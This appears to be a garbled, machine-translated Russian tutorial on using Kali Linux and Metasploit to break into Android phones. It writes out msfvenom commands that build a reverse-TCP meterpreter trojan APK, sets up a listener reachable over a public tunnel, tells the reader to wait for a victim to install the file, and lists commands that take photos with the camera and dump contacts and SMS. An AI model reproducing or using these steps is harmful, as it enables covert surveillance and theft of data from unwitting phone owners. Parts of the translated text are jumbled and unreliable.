Введение

Kali Linux ранее был дистрибутивом BackTrack Linux. Kali Linux — это дистрибутив Linux на основе Debian, который считается одним из лучших дистрибутивов Linux для тестирования на проникновение, и это справедливо.

Общая конфигурация Kali и базовое использование

1. Мыслительная карта шагов внешней сети

NgrokПроникнуть в публичную сетьIp---> Kali LinuxIPПроникнуть наружу-----> Создать test.apk ----->монитор Текущий IPНажимать ли---->Отправить на целевой компьютерexe---->Нажмитеtest.apk

1. Загрузите версию клиента в соответствии с условиями системы атакующей машины. Загрузите 64-битную версию Linux здесь.

2. Перетащите на виртуальную машину, и она не может быть загружена. Обратитесь к предыдущему руководству, чтобы разархивировать zip-архив.

3. Войдите в распакованный каталог и, если появится сообщение об ошибке TCP, зайдите в Ngrok и снова измените туннель. Многие используют его бесплатно.

./sunny clientid id =>туннельid

Не закрывать текущее окно после его запуска

3. MSF генерирует внешние сетевые трояны.

Без TCP| порт, в противном случае будет сообщено об ошибке msfvenom -p android/meterpreter/reverse_tcp LHOST=IP-адрес, через который проникает внешняя сеть LPORT=порт проникновения во внешнюю сеть R >/home/test.apk

4. Откройте msf и настройте полезную нагрузку для загрузки модуля атаки, а также установите локальный IP-адрес и порт прослушивания.

мсфконсоль включена

5. Привязать текущий IP порта

1. use multi/handler
2. set payload android/meterpreter/reverse_tcp
3. установить LHOST текущий IP Kali
4. set LPORT 4444

1. показать параметры 08. Просмотр настроек IP-порта 09;

1. запустить, чтобы включить мониторинг

6. Подождите, пока собеседник нажмет на троянский вирус test.apk.

В случае успеха у вас появится командная строкаmeterpreter. Просто выполните команду.

sysinfo //Просмотр информации о мобильном телефоне

app_list //Просмотр информации о мобильном приложении

webcam_snap // фотографируем

Сохранить в этот каталог

Фотография сделана удачно.

При фотосъемке на мобильный телефон слышен звук

То есть мы проникаем в публичную сеть и публичная сеть проникаетсоединятьместныйIp---->мониторместныйIP ---->目标Нажмите.exe--->

Вот как взломать ваш телефон и контролировать его камеру:

Убедитесь, что Kali и ваш телефон находятся в одном сегменте сети и подключены к одной сети Wi-Fi. Выберите режим моста в сетевом адаптере Kali и введите команду dhclient`, чтобы переназначить IP-адрес и убедиться, что он находится в том же сегменте сети, что и мобильный телефон.

Введите команду `msfconsole` в терминале Kali, чтобы запустить среду Metasploit.

Используйте `msfvenom` для создания троянского приложения Android, которое предварительно настроено на подключение к хосту Kali. Введите команду `msfvenom -p android/meterpreter/reverse_tcp LHOST=ваш Kali IP LPORT=5555`, затем выберите полезную нагрузку, например `android/meterpreter/reverse_tcp`, и установите IP и порт локального прослушивающего хоста.

Запустите команду «exploit», чтобы начать мониторинг, и дождитесь подключения телефона к сети.

После подключения телефона к сети установите на телефон файл apk.

После установки троянского приложения на телефон вы можете использовать командную строку Metasploit для управления телефоном, например для просмотра информации о телефоне («sysinfo»), включения камеры («webcam_stream»), фотографирования («webcam_snap») и экспорт контактной информации («dump_contacts»), записи СМС («dump_sms») и т. д.